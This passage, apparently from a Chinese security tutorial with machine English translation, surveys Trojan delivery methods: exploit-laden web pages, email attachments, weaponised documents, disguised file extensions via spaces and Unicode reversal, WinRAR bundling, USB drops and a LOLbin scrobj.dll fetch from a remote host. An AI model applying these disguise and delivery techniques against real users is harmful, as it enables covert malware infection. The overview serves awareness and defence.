通过网页挂MA实现比较典型,通常需要利用浏览器或相关漏洞,再结合实时新闻、热点话题制作相关网页,将漏洞和网页结合,最后生成恶意网页,当用户打开网页时,远程的木马程序会自动下载和安装。常见的漏洞比如:MS06014、MS10003。
It usually needs to use the browser or related vulnerabilities, and then combine the real-time news and hot topics to make relevant web pages, and combine the vulnerabilities and web pages, and finally generate malicious web pages. When the user opens the web page, the remote Trojan horse program will automatically download and install. Common vulnerabilities include: MS06014, MS10003.
电子邮件植入最常见的是通过附件的形式,当用户打开附件时被注入木马;另一种是电子邮件与恶意网页相结合,由于电子邮件是支持HTML正文的,如果将相关漏洞植入到网页中,也是能够达到相关的效果。即使不打开附件,选中就会被植入(以HTML格式发送,如求职者)
Email implantation is most commonly in the form of an attachment, which is injected into the Trojan when the user opens the attachment. The other is the combination of email and malicious web pages. Because email supports HTML body, if relevant vulnerabilities are implanted into web pages, they can also achieve relevant effects. Even if the attachment is not opened, the selection will be implanted (sent in HTML format, e.g., job seeker)
这也是一种有效的方式,通过office文档、pdf文档漏洞等将文档进行捆绑,当用户打开文档时会触发漏洞,从而释放木马或执行shellcode执行远程攻击。这种文档同时也常用于邮件附件的形式发送。
It is also an effective way to bundle documents through vulnerabilities in office documents, pdf documents, etc. The vulnerability is triggered when the user opens the document, thereby releasing Trojan horses or executing shellcode to perform remote attacks. This document is also commonly sent as an email attachment.
比如可以对exe的文件后缀名进行修改,在原本一个“exe”文件前增加“doc”,然后输入很多空格让其exe不显示出来,再修改成文档类图标,从而进行伪装;另一种是更改后缀名(Unicode翻转字符),将“cod”进行翻转,再就是图标伪装等。
For example, you can modify the file suffix of the exe, add 'doc' in front of the original 'exe' file, and then enter a lot of Spaces to make the exe not show up, and then modify it into a document icon, so as to disguise; Another is to change the suffix (Unicode flip characters), to flip the 'cod', and icon camouflage, etc.
EXE捆绑、文档嵌入、多媒体文件、电子书植入。在“三十六.WinRAR漏洞复现(CVE-2018-20250)及恶意软件自启动劫持”文章中,我详细讲解了通过WinRAR捆绑文件的方法。
EXE bundling, document embedding, multimedia files, e-book embedding. In the article '36.WinRAR Vulnerability Reemergence (CVE-2018-20250) and Malware Self-Boot Hijacking', I explain in detail the method of bundling files through WinRAR.
攻击者通过远程命令执行的方式,利用远程控制工具将木马植入到目标计算机中。
The attacker uses remote control tools to implant the Trojan horse into the target computer through remote command execution.
攻击者利用社交工程手段,通过诱骗用户点击恶意链接、下载附件或执行恶意代码等方式,将木马植入到受害者的计算机中。
An attacker uses social engineering to implant a Trojan into a victim's computer by tricving the user into clicking a malicious link, downloading an attachment, or executing malicious code.
比如特定U盘植入(故意丢弃、或者工作U盘、数据拷贝等)等。在APT攻击中的恶意诱饵类型众多,包括白加黑、lnk、doc文档、带有WinRARACE(CVE-2018-20250)漏洞的压缩包等,之后的攻击中还新增了伪装为word图标的可执行文件、chm文件等。比如,通过加载scrobj.dll,远程调用http://45.xxx.xxx.67/window.sct,利用Microsoft系统文件的LOLbin以绕过杀软的监测,达到远程执行代码。
Such as specific U disk implantation (deliberately discarded, or working U disk, data copy, etc.). There are many types of malicious decoys in APT attacks, including white and black, lnk, doc documents, compressed packages with WinRARACE (CVE-2018-20250) vulnerabilities, etc. Later attacks also add executable files disguised as word ICONS, chm files, etc. For example, by loading scrobj. DLL, remote call http://45.xxx.xxx.67/window.sct, use the Microsoft system files LOLbin to bypass kill soft monitoring, to the remote code execution.
联系客服
